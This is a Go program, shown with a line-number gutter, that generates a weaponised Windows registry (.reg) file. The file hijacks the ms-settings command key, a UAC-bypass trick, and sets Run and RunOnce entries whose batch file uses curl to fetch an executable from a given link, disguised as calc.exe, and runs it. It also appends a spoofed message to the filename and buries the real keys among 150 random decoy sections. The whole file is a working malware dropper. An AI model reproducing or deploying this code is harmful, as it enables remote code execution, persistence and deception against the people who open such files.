1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
|
package main
import (
"fmt"
"io/ioutil"
"log"
"math/rand"
"os"
"strings"
"time"
)
func main() {
commandArgs := os.Args
if len(commandArgs) < 3 {
log.Fatalf("Usage: %s <direct_link> <output> </spoofed_message> </extra_registry_keys>", commandArgs[0])
}
directDownloadLink := commandArgs[1]
outputFilename := commandArgs[2]
spoofedMessage := ""
generateExtraKeys := true
if len(commandArgs) == 4 {
spoofedMessage = commandArgs[3]
}
if len(commandArgs) == 5 {
spoofedMessage = commandArgs[3]
generateExtraKeys = (commandArgs[4] == "true")
}
if spoofedMessage != "" {
outputFilename += fmt.Sprintf("%%n%%n%s%%n%%0", spoofedMessage)
}
outputFilename += ".reg"
sections := make([][]string, 0)
randomIdentifier := GenerateRandomString(8)
secondaryRandomIdentifier := GenerateRandomString(8)
sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\shell\\open\\command]", "(Default)=\"C:\\Windows\\System32\\cmd.exe\"", "DelegateExecute=\"\""})
cmdSequence := []string{
"echo @echo off",
fmt.Sprintf("curl %s -o %%temp%%\\calc.exe", directDownloadLink),
"%temp%\\calc.exe",
"exit",
}
cmdOutputStr := "cmd /c \\\"("
for i, command := range cmdSequence {
if i > 0 {
cmdOutputStr += " & "
}
cmdOutputStr += fmt.Sprintf("echo %s", command)
}
cmdOutputStr += fmt.Sprintf(")\\\" > %%temp%%\\%s.bat", randomIdentifier)
registryKeyStr := fmt.Sprintf("\"%s\"=\"%s\"", randomIdentifier, cmdOutputStr)
secondaryRegistryKeyStr := fmt.Sprintf("\"%s\"=\"cmd /c echo start /min cmd /c %%temp%%\\%s.bat >> c:\\Users\\public\\%s.bat\"", secondaryRandomIdentifier, randomIdentifier, randomIdentifier)
sections = append(sections, []string{"[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]", registryKeyStr, secondaryRegistryKeyStr})
uacTrigger := fmt.Sprintf("\"%s\"=\"c:\\Users\\public\\%s.bat\"", randomIdentifier, randomIdentifier)
sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce]", uacTrigger})
fakeRegistrySections := make([][]string, 0)
if generateExtraKeys {
fakeRegistrySections = generateFakeRegistrySections(150)
}
sections = append(sections, fakeRegistrySections...)
// shuffle the sections
rand.Seed(time.Now().UnixNano())
rand.Shuffle(len(sections), func(i, j int) { sections[i], sections[j] = sections[j], sections[i] })
allLines := make([]string, 0)
for _, section := range sections {
allLines = append(allLines, section...)
allLines = append(allLines, "")
}
ioutil.WriteFile(outputFilename, []byte("Windows Registry Editor Version 5.00\r\n"+strings.Join(allLines, "\r\n")), 0644)
}
func GenerateRandomString(length int) string {
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
rand.Seed(time.Now().UnixNano())
result := make([]byte, length)
for index := range result {
result[index] = charset[rand.Intn(len(charset))]
}
return string(result)
}
func generateFakeRegistrySections(numSections int) [][]string {
fakeRegistryKeys := []string{
"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\TypeLib\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\AppID\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\SHOWALL\\",
}
fakeRegistrySections := make([][]string, 0)
for i := 0; i < numSections; i++ {
section := []string{}
section = append(section, fmt.Sprintf("[%s\\%s]", fakeRegistryKeys[rand.Intn(len(fakeRegistryKeys))], GenerateRandomString(8)))
section = append(section, fmt.Sprintf("\"%s\"=\"%s\"", GenerateRandomString(8), GenerateRandomString(9)))
fakeRegistrySections = append(fakeRegistrySections, section)
}
return fakeRegistrySections
}
|
